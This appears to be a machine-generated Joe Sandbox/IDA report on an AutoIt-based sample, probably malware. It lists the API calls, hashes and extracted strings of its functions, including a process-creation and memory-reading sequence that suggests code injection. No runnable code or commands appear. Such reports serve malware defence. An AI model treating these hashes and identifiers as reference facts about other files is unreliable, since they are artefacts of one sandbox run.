                            • Opcode Fuzzy Hash: 775e714229d5e2182a56a60c8684644beba80e8b86a9d98342ef7d4cc84c8ba9
                            • Instruction Fuzzy Hash: 75514BB94043449BC714EF98EC85CAAB7F8FB4E310B80492EF54593672EB7496C4CB66

                            Control-flow Graph
                            • Rendered graph not reproduced; entry block 829c2-829e2 (legend: Executed / Not Executed)
                            APIs
                            • DefWindowProcW.USER32(?,?,?,?), ref: 00082A33
                            • KillTimer.USER32(?,00000001), ref: 00082A5D
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00082A80
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00082A8B
                            • CreatePopupMenu.USER32 ref: 00082A9F
                            • PostQuitMessage.USER32(00000000), ref: 00082AAE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                            • String ID: TaskbarCreated
                            • API String ID: 129472671-2362178303
                            • Opcode ID: bdc59f7ad13e5422ec91b698fbaa8dd353938788792fd661b8605fbecc3e7e6e
                            • Instruction ID: 35239f0927110e443f4dacef8387a8a5ad0e7b7da38569861652685b541b9568
                            • Opcode Fuzzy Hash: bdc59f7ad13e5422ec91b698fbaa8dd353938788792fd661b8605fbecc3e7e6e
                            • Instruction Fuzzy Hash: FE41E571114246ABDB38BF64EC09BBD36D5FF15300F040126F6C2979A2DBA59DC09766

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 000830B0
                            • LoadCursorW.USER32(00000000,00007F00), ref: 000830BF
                            • LoadIconW.USER32(00000063), ref: 000830D5
                            • LoadIconW.USER32(000000A4), ref: 000830E7
                            • LoadIconW.USER32(000000A2), ref: 000830F9
                              • Part of subcall function 0008318A: LoadImageW.USER32(00080000,00000063,00000001,00000010,00000010,00000000), ref: 000831AE
                            • RegisterClassExW.USER32(?), ref: 00083167
                              • Part of subcall function 00082F58: GetSysColorBrush.USER32(0000000F), ref: 00082F8B
                              • Part of subcall function 00082F58: RegisterClassExW.USER32(00000030), ref: 00082FB5
                              • Part of subcall function 00082F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00082FC6
                              • Part of subcall function 00082F58: InitCommonControlsEx.COMCTL32(?), ref: 00082FE3
                              • Part of subcall function 00082F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00082FF3
                              • Part of subcall function 00082F58: LoadIconW.USER32(000000A9), ref: 00083009
                              • Part of subcall function 00082F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00083018
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
                            • Opcode ID: f8375929140068b49112390ea4e9a1f1a0bc63744a489c894fe444d1c46f7b66
                            • Instruction ID: 6998a196106243df508f3f76191fdfff8aa637e949adb94bffbeef949bdb2915
                            • Opcode Fuzzy Hash: f8375929140068b49112390ea4e9a1f1a0bc63744a489c894fe444d1c46f7b66
                            • Instruction Fuzzy Hash: D5213CB8D00314ABCB10DFA9EC49A99BFF5FB49714F00412AF614A36B0D7B545C08F95

                            Control-flow Graph

                            • Rendered graph not reproduced; entry block a51fb8-a52066 (legend: Executed / Not Executed)
                            APIs
                            • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00A52089
                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A522AF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateFileFreeVirtual
                            • String ID:
                            • API String ID: 204039940-0
                            • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                            • Instruction ID: 5e6f52bbc6e93ff30bd167fa766dbfce85623ff64b072868d82df50b84da7543
                            • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                            • Instruction Fuzzy Hash: 94A11974E00209EBDB14CFA4C994BEEBBB5FF49305F208159EA11BB280D7759A85CF50

                            Control-flow Graph
                            • Rendered graph not reproduced; entry block 9eb05-9eb2f (legend: Executed / Not Executed)
                            APIs
                            • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0009EADA,?,?), ref: 0009EB27
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0009EADA,?,?), ref: 000F4B26
                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0009EADA,?,?), ref: 000F4B65
                            • RegCloseKey.ADVAPI32(?,?,0009EADA,?,?), ref: 000F4B94
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: QueryValue$CloseOpen
                            • String ID: Include$Software\AutoIt v3\AutoIt
                            • API String ID: 1586453840-614718249
                            • Opcode ID: 8a96cda69b2aeb9544fa01482f06a009250f02d8a018108b00673bf4533aed10
                            • Instruction ID: 043189ad4ddc6c8dda9e6581fca3ca092781022726c286cfb2bb8cac3b5da5e9
                            • Opcode Fuzzy Hash: 8a96cda69b2aeb9544fa01482f06a009250f02d8a018108b00673bf4533aed10
                            • Instruction Fuzzy Hash: FC113D71601108BEEB04ABA4DD86EFF77BCEB04354F104469B546E6092EBB09E41D750

                            Control-flow Graph
                            • Rendered graph not reproduced; single block 82e9d-82f0d (legend: Executed / Not Executed)
                            APIs
                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00082ECB
                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00082EEC
                            • ShowWindow.USER32(00000000), ref: 00082F00
                            • ShowWindow.USER32(00000000), ref: 00082F09
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$CreateShow
                            • String ID: AutoIt v3$edit
                            • API String ID: 1584632944-3779509399
                            • Opcode ID: 129af3c5f08fd26b3d1d92ad2318330d97e63d51845f049f8f1efbd39cb6a52e
                            • Instruction ID: 20aff97399895e2ef54d2bf8b188c78e7b41f266c2f6bab7e621df8663b806aa
                            • Opcode Fuzzy Hash: 129af3c5f08fd26b3d1d92ad2318330d97e63d51845f049f8f1efbd39cb6a52e
                            • Instruction Fuzzy Hash: FCF0D0755802D47AD7315B57BC48E673E7DE7C7F20B01411EB904A3570C66508D5DA71

                            Control-flow Graph
                            • Rendered graph not reproduced; entry block a51d58-a51eb7 (legend: Executed / Not Executed)
                            APIs
                              • Part of subcall function 00A51C48: Sleep.KERNEL32(000001F4), ref: 00A51C59
                            • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00A51EAD
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CreateFileSleep
                            • String ID: 3BOG1KTWR2M8XFV873TPSRS591YWM
                            • API String ID: 2694422964-1159107725
                            • Opcode ID: 0c2a6d109cf65bea2b48aef015542c42dd75a29ff6ddcca05e914828b31ef5a2
                            • Instruction ID: 0c23eebe3eab6d2fdb7619b45e59757482a7b048f22f828b1580b9e896b7b3cd
                            • Opcode Fuzzy Hash: 0c2a6d109cf65bea2b48aef015542c42dd75a29ff6ddcca05e914828b31ef5a2
                            • Instruction Fuzzy Hash: DA616130D08288DAEF11DBF4C845BEEBB75AF19305F044199E5587B2C1D7BA0B49CB65
                            APIs
                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000F454E
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • _memset.LIBCMT ref: 00083965
                            • _wcscpy.LIBCMT ref: 000839B5
                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000839C6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                            • String ID: Line:
                            • API String ID: 3942752672-1585850449
                            • Opcode ID: 14dcca09d312e6b0401eaebd00aec72f55b0f85e99eefcfc066cb621a79d939e
                            • Instruction ID: 9a8b56786983c6e1fc02782b819cb6030b8696c7e979a54f59ecca464aef18da
                            • Opcode Fuzzy Hash: 14dcca09d312e6b0401eaebd00aec72f55b0f85e99eefcfc066cb621a79d939e
                            • Instruction Fuzzy Hash: 3F319071008340ABD721FB60DC45BDF77E8BB95710F00451AF5C9925B2EBB0AA88CB92
                            APIs
                              • Part of subcall function 00083F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,000834E2,?,00000001), ref: 00083FCD
                            • _free.LIBCMT ref: 000F3C27
                            • _free.LIBCMT ref: 000F3C6E
                              • Part of subcall function 0008BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,001422E8,?,00000000,?,00083E2E,?,00000000,?,0011DBF0,00000000,?), ref: 0008BE8B
                              • Part of subcall function 0008BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00083E2E,?,00000000,?,0011DBF0,00000000,?,00000002), ref: 0008BEA7
                              • Part of subcall function 0008BDF0: __wsplitpath.LIBCMT ref: 0008BF19
                              • Part of subcall function 0008BDF0: _wcscpy.LIBCMT ref: 0008BF31
                              • Part of subcall function 0008BDF0: _wcscat.LIBCMT ref: 0008BF46
                              • Part of subcall function 0008BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0008BF56
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                            • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                            • API String ID: 1510338132-1757145024
                            • Opcode ID: 02d01eeb7fe253d7405f7a97b9e49407220bdb0c153012029f86055d5a063877
                            • Instruction ID: 4d1eef8eed954e803c7156a23e087a530940d4e44a019b03b04f6f5b4d464291
                            • Opcode Fuzzy Hash: 02d01eeb7fe253d7405f7a97b9e49407220bdb0c153012029f86055d5a063877
                            • Instruction Fuzzy Hash: C8915071A1021DAFCF04EFA4CC919FEB7B4BF05320F144429F956AB292EB749A45DB60
                            APIs
                            • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0009C948,SwapMouseButtons,00000004,?), ref: 0009C979
                            • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0009C948,SwapMouseButtons,00000004,?,?,?,?,0009BF22), ref: 0009C99A
                            • RegCloseKey.KERNEL32(00000000,?,?,0009C948,SwapMouseButtons,00000004,?,?,?,?,0009BF22), ref: 0009C9BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseOpenQueryValue
                            • String ID: Control Panel\Mouse
                            • API String ID: 3677997916-824357125
                            • Opcode ID: 015398f817ac5ed37b1df235e8aea94b4b5dc632d606ed879321d01b484e97af
                            • Instruction ID: a99ea9cfece38967a51fbe5bce4fc1baf48e69987cd980c56028ae3c73c09103
                            • Opcode Fuzzy Hash: 015398f817ac5ed37b1df235e8aea94b4b5dc632d606ed879321d01b484e97af
                            • Instruction Fuzzy Hash: D8113C75911208BFEF218FA4DC48EBE77F8EF05744F10445AB945E7214D6719E50AB60
                            APIs
                            • CreateProcessW.KERNEL32(?,00000000), ref: 00A51403
                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A51499
                            • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00A514BB
                            Memory Dump Source
                            • Source File: 00000000.00000002.2090155966.0000000000A4F000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A4F000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_a4f000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                            • String ID:
                            • API String ID: 2438371351-0
                            • Opcode ID: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                            • Instruction ID: 3f107023db818ea8ea50f8daa60d1945ed9480d03cc6757f81f30df45441038d
                            • Opcode Fuzzy Hash: 9a8a17a12fb03160a4a55839945f9e7e1859a6c72d72ca89e8ed8c326fc6e5c7
                            • Instruction Fuzzy Hash: 8D620A30A142589BEB24CFA4C841BEEB376FF58301F1091A9D50DEB390E7799E85CB59
                            APIs
                              • Part of subcall function 000841A7: _fseek.LIBCMT ref: 000841BF
                              • Part of subcall function 000CCE59: _wcscmp.LIBCMT ref: 000CCF49
                              • Part of subcall function 000CCE59: _wcscmp.LIBCMT ref: 000CCF5C
                            • _free.LIBCMT ref: 000CCDC9
                            • _free.LIBCMT ref: 000CCDD0
                            • _free.LIBCMT ref: 000CCE3B
                              • Part of subcall function 000A28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,000A8715,00000000,000A88A3,000A4673,?), ref: 000A28DE
                              • Part of subcall function 000A28CA: GetLastError.KERNEL32(00000000,?,000A8715,00000000,000A88A3,000A4673,?), ref: 000A28F0
                            • _free.LIBCMT ref: 000CCE43
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                            • String ID:
                            • API String ID: 1552873950-0
                            • Opcode ID: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                            • Instruction ID: 07331a2a56a8c0bc922fb3eb00b18653883a97aaf1f50a595630236b871ecf29
                            • Opcode Fuzzy Hash: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                            • Instruction Fuzzy Hash: A6512EB1904219AFDF159F64CC81BEEB7B9BF49300F1040AEF65DA3252DB715A808F69
                            APIs
                            • _memset.LIBCMT ref: 000F3CF1
                            • GetOpenFileNameW.COMDLG32(?,?,00000001,001422E8), ref: 000F3D35
                              • Part of subcall function 000831B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 000831DA
                              • Part of subcall function 00083A67: SHGetMalloc.SHELL32(00083C31), ref: 00083A7D
                              • Part of subcall function 00083A67: SHGetDesktopFolder.SHELL32(?), ref: 00083A8F
                              • Part of subcall function 00083A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00083AD2
                              • Part of subcall function 00083B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,001422E8,?), ref: 00083B65
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                            • String ID: X
                            • API String ID: 3714316930-3081909835
                            • Opcode ID: 40ce8eb9fc8f35cf303dfdaa033fc711991c2dc7e1e92f976e0464105bfdd0ae
                            • Instruction ID: 7016dba5c58a8569e66c58dab837cdbdffb1ec741e9478046455d9b6943fc29e
                            • Opcode Fuzzy Hash: 40ce8eb9fc8f35cf303dfdaa033fc711991c2dc7e1e92f976e0464105bfdd0ae
                            • Instruction Fuzzy Hash: B411CAB1A10288ABCF05EFD4D8056DEBBF9BF85B04F008009E551BB242DBB54649CBA5
                            APIs
                            • GetTempPathW.KERNEL32(00000104,?), ref: 000CD01E
                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 000CD035
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Temp$FileNamePath
                            • String ID: aut
                            • API String ID: 3285503233-3010740371
                            • Opcode ID: b5b33a744edc1a75d13099ccdcb9e4b0cdf24d3f46398a0bb929347ea7507171
                            • Instruction ID: 8a4823d18946ede76ebb09a01ebe9df4e1ef2102357935e4a10b116ae406ed10
                            • Opcode Fuzzy Hash: b5b33a744edc1a75d13099ccdcb9e4b0cdf24d3f46398a0bb929347ea7507171
                            • Instruction Fuzzy Hash: 80D05EB154030EBBDB10ABA0ED0EF99776CA700709F1081907654D10D1D7F0D6858BA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a0cdf697802018cb91cfe8dd5715f30b1d2e3a64cc343eec2b27cdff07fc4724
                            • Instruction ID: 29c128ae7ce8836ff1fc86e18c43f7ea28a123e4e252109714ced71d10c07d9a
                            • Opcode Fuzzy Hash: a0cdf697802018cb91cfe8dd5715f30b1d2e3a64cc343eec2b27cdff07fc4724
                            • Instruction Fuzzy Hash: CDF16C716047029FC710DF28C580BAAB7E5BF88314F14892EF99A9B392D771E945CF92
                            APIs
                            • SHGetMalloc.SHELL32(00083C31), ref: 00083A7D
                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 00083AD2
                            • SHGetDesktopFolder.SHELL32(?), ref: 00083A8F
                              • Part of subcall function 00083B1E: _wcsncpy.LIBCMT ref: 00083B32
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: DesktopFolderFromListMallocPath_wcsncpy
                            • String ID:
                            • API String ID: 3981382179-0
                            • Opcode ID: ac44beda6a75aad244f09d081e414d96db5445820882c86690c7cf7a1e63e603
                            • Instruction ID: e381949a0fdef56bfc57c3f33d247e48f5a696689ce8b9e207f41923504cfeef
                            • Opcode Fuzzy Hash: ac44beda6a75aad244f09d081e414d96db5445820882c86690c7cf7a1e63e603
                            • Instruction Fuzzy Hash: D9214C76B00118ABCB14EF95DC88DEEB7BDEF88700B1040A9F64AD7255DB709E46CB90
                            APIs
                            • _memset.LIBCMT ref: 000835BE
                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00083667
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: IconNotifyShell__memset
                            • String ID:
                            • API String ID: 928536360-0
                            • Opcode ID: 05679f24cc0a585679a0d27695e12efac13f09079903809ba75b56d45d2c929b
                            • Instruction ID: ea5cba71b85694c7061632edfae38304cc7c9e80889075d594c75395da3f0334
                            • Opcode Fuzzy Hash: 05679f24cc0a585679a0d27695e12efac13f09079903809ba75b56d45d2c929b
                            • Instruction Fuzzy Hash: E93150B4504701AFC761EF78D845697BBE4FB89708F00092EF6DA83751E771AA88CB52
                            APIs
                            • __FF_MSGBANNER.LIBCMT ref: 000A4603
                              • Part of subcall function 000A8E52: __NMSG_WRITE.LIBCMT ref: 000A8E79
                              • Part of subcall function 000A8E52: __NMSG_WRITE.LIBCMT ref: 000A8E83
                            • __NMSG_WRITE.LIBCMT ref: 000A460A
                              • Part of subcall function 000A8EB2: GetModuleFileNameW.KERNEL32(00000000,00140312,00000104,?,00000001,000A0127), ref: 000A8F44
                              • Part of subcall function 000A8EB2: ___crtMessageBoxW.LIBCMT ref: 000A8FF2
                              • Part of subcall function 000A1D65: ___crtCorExitProcess.LIBCMT ref: 000A1D6B
                              • Part of subcall function 000A1D65: ExitProcess.KERNEL32 ref: 000A1D74
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            • RtlAllocateHeap.NTDLL(00A00000,00000000,00000001,?,?,?,?,000A0127,?,0008125D,00000058,?,?), ref: 000A462F
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                             • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
